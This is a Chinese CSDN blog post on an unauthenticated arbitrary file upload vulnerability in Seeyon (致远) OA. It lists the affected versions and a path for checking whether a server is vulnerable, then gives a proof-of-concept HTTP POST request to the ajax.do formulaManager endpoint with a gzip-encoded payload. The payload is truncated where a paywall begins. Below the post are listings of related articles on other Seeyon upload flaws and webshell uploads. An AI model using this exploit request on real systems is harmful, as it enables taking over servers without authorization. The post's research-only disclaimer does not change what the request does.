致远OA任意文件上传

最新推荐文章于 2024-08-08 22:57:09 发布
最新推荐文章于 2024-08-08 22:57:09 发布
阅读量5.2k 收藏 7
点赞数 1
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dalian0/article/details/121125395
版权
本文介绍了致远OA系统多个版本存在的文件上传漏洞,详细列出受影响的版本。通过访问特定URL触发异常,展示漏洞验证过程,并提供POC代码。此外,分享了一款集成多种OA系统漏洞的工具,可用于学习和测试。请注意,文中提及的工具和信息仅限于合法的学习和研究用途。
摘要由CSDN通过智能技术生成

漏洞影响范围:

致远OA V8.0
致远OA V7.1、V7.1SP1
致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3
致远OA V6.0、V6.1SP1、V6.1SP2
致远OA V5.x
致远OA G6

搭建环境测试:

漏洞验证:

访问/seeyon/autoinstall.do/..;/ajax.do出现下图异常,存在漏洞

抓包修改数据包

POC:

POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 5166
Host: 192.168.0.102:8082
Connection: close

managerMethod=validate&arguments=%1F%C2%8B%08%00%C2%9C%C2%A8%C3%BB%60%00%C3%BF%C2%8DV%5B%C2%93%C2%9AH%14%7E%C3%9F%5Fa%C3%8D%C3%8BLj%C2%B2%C2%A6%05%C3%89%C2%84M%C3%AD%C3%83%C3%80H%C2%83%28%C2%A3%C2%A2%C3%9C%C2%B6%C3%B6%01%1A%04%C2%B4%C2%B9D%40%C3%85T%C3%BE%7BN%C2%A3%C2%93q6%C3%99%C2%AD%C2%B5%C3%8A%C2%82%C3%AE%3E%C3%97%C3%AF%7C%C3%A74%7F%7D%C2%BD%5D%17%C2%BB%C2%AC%C2%A1%C3%BE%C2%B2%2D%C2%A3%C3%9B%3Fz%C2%83%C3%B7%C2%BD%C2%97%1D%C3%83%C

最低0.47元/天 解锁文章
Dalian0
关注
致远互联-OA前台fileUpload.do存在任意文件上传(含批量验证poc)
weixin_43567873的博客
04-28 309
致远互联-OA前台fileUpload.do存在任意文件上传(含批量验证poc)
漏洞复现】致远OA-任意文件上传-fileUpload
知黑而守白
04-10 281
致远OA是一款企业级办公自动化软件,提供了办公流程管理、文档管理、协同办公、知识管理等功能。它可以帮助企业实现信息化办公,提高工作效率和协同能力。致远OA具有灵活的流程设计和定制能力,可以根据企业的需求进行个性化配置。同时,它还支持移动办公,可以在手机、平板等设备上进行办公操作。致远OA已经在各行各业得到广泛应用,成为许多企业的重要办公工具之一。
致远OA文件上传漏洞(含批量检测POC)
热门推荐
今天是几号的博客
03-21 1万+
由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3。致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1)致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3。致远OA G6、G6N (V8.1、V8.1SP1)。致远OA V6.0、V6.1SP1、V6.1SP2。致远OA V7.1、V7.1SP1
漏洞复现】致远OA多个任意文件上传批量检测验证
最新发布
qq_48368964的博客
08-08 905
由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3。致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1)致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3。
漏洞复现】致远OA wpsAssistServlet接口存在任意文件上传漏洞
失心少年
11-18 448
在协同运营平台全面升级的基础上,V8.0深耕大型企业管理模式、运营机制,进一步强化“协同”在管理中的价值,推动大中型企业、集团企业、国资以及高新技术企业的管理模式升级,帮助企业构筑全程、全域、全端的运营和服务能力,提升人员效率和组织绩效,赋能企业数字化、智能化发展。本文所提供的工具仅用于学习,禁止用于其他!漏洞链接:https://127.0.0.1/seeyon/wpsAssistServlet?
致远oa wpsassistservlet任意文件上传漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-29 2205
致远OA是一款流行的协同管理软件,在各中、大型企业机构中广泛使用。致远oa wpsassistservlet漏洞由于致远OA旧版本某些接口能被未授权访问,并且部分函数存在过滤不足,攻击者通过构造恶意请求,权限绕过漏洞,可在无需登录的情况下上传恶意脚本文件,从而控制getshell。致远oa wpsassistservlet漏洞影响范围,致远oa wpsassistservlet漏洞漏洞检测 测试POC:http://1.2.3.4:80/seeyon/thirdpartyController.do.css/
致远OA-ajax.do未授权文件上传漏洞1
08-08
近日,致远OA ajaxAction 文件上传漏洞利用代码披露,由于致远OA旧版本中某些接口存在未授权访问,以及部分函数过滤不足,攻击者通过构造恶意请求,可在无
【1day】致远OA漏洞wpsAssistServlet接口任意文件上传漏洞学习
记录并分享学习安全的知识点..
08-11 1805
2022护网新爆出的致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。
LiqunKit-1.6.2 综合漏洞利用工具交流版,后门自测,建议虚拟机使用
04-08
LiqunKit-1.6.2 综合漏洞利用工具交流版,后门自测,建议虚拟机使用
对 Redis 在 Windows 下利用方式思考1
08-04
前言上次写了一篇有关 SSRF 打 Redis 主从的文章,居然被人喷了!说我根本就没有复现过张嘴就来?我没有理会,然后又有朋友在群问, Redis 在 Win
致远OA wpsAssistServlet 任意文件上传漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
11-17 1044
致远OA互联新一代智慧型协同运营平台以中台的架构和技术、协同、业务、连接、数据的专 业能力,夯实协同运营中台的落地效果;以移动化、AI智能推进前台的应用创新,实现企业轻量化、智能化业务场景,促进企业全过程管理能效,赋予企业协同工作和运营管理的新体验。
致远OA wpsAssistServlet接口存在任意文件上传漏洞
weixin_44304678的博客
11-02 663
致远OA互联新一代智慧型协同运营平台以中台的架构和技术、协同、业务、连接、数据的专 业能力,夯实协同运营中台的落地效果;在协同运营平台全面升级的基础上,V8.0深耕大型企业管理模式、运营机制,进一步强化“协同”在管理中的价值,推动大中型企业、集团企业、国资以及高新技术企业的管理模式升级,帮助企业构筑全程、全域、全端的运营和服务能力,提升人员效率和组织绩效,赋能企业数字化、智能化发展。作者对使用该文章导致的任何直接或间接损失不承担任何责任。该文章仅用于授权测试,任何未经授权的测试均属于非法行为。
致远OA fileUpload.do 前台文件上传绕过漏洞复现(XVE-2024-8166)
0xSec
04-08 2583
致远互联-OA 接口 fileUpload.do 接口处存在文件上传漏洞,未经身份验证的远程攻击者可通过目录遍历的方式绕过上传接口限制,并利用menu.do接口替换上传文件的fileid值实现webshell上传到服务器,获取服务器权限,控制整个 web 服务器。
漏洞复现】致远互联 OA fileUpload.do 文件上传漏洞
qq_34914659的博客
06-18 1496
致远OA是一款企业级办公自动化软件,提供了办公流程管理、文档管理、协同办公、知识管理等功能。它可以帮助企业实现信息化办公,提高工作效率和协同能力。该系统fileUpload.do存在文件上传漏洞
致远oa wpsassistservlet 任意文件读取漏洞
12-27
致远oa wpsassistservlet 任意文件读取漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取系统中的任意文件,包括重要的系统文件及用户数据文件。攻击者可以通过该漏洞来获取敏感信息,危害系统安全。 这个漏洞存在的根本原因可能是在致远oa wpsassistservlet中对用户输入的数据没有进行充分的验证和过滤,导致攻击者可以构造恶意请求,获取系统文件的内容。一旦攻击者成功利用这个漏洞,就可能对系统进行攻击,损害系统的安全性。 针对致远oa wpsassistservlet 任意文件读取漏洞,我们可以采取一些措施来加强系统的安全性。首先,及时更新系统补丁,确保系统能够及时修复这个漏洞。其次,加强对用户输入数据的验证和过滤,限制用户的输入范围,避免攻击者利用恶意输入来进行攻击。另外,加强系统的监控和审计功能,及时发现异常行为,并进行处理。 总的来说,致远oa wpsassistservlet 任意文件读取漏洞是一种严重的安全隐患,需要引起相关部门的重视,采取必要的措施来确保系统的安全性。只有不断加强系统的安全防护措施,及时修复存在的漏洞,才能有效地提升系统的安全性。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值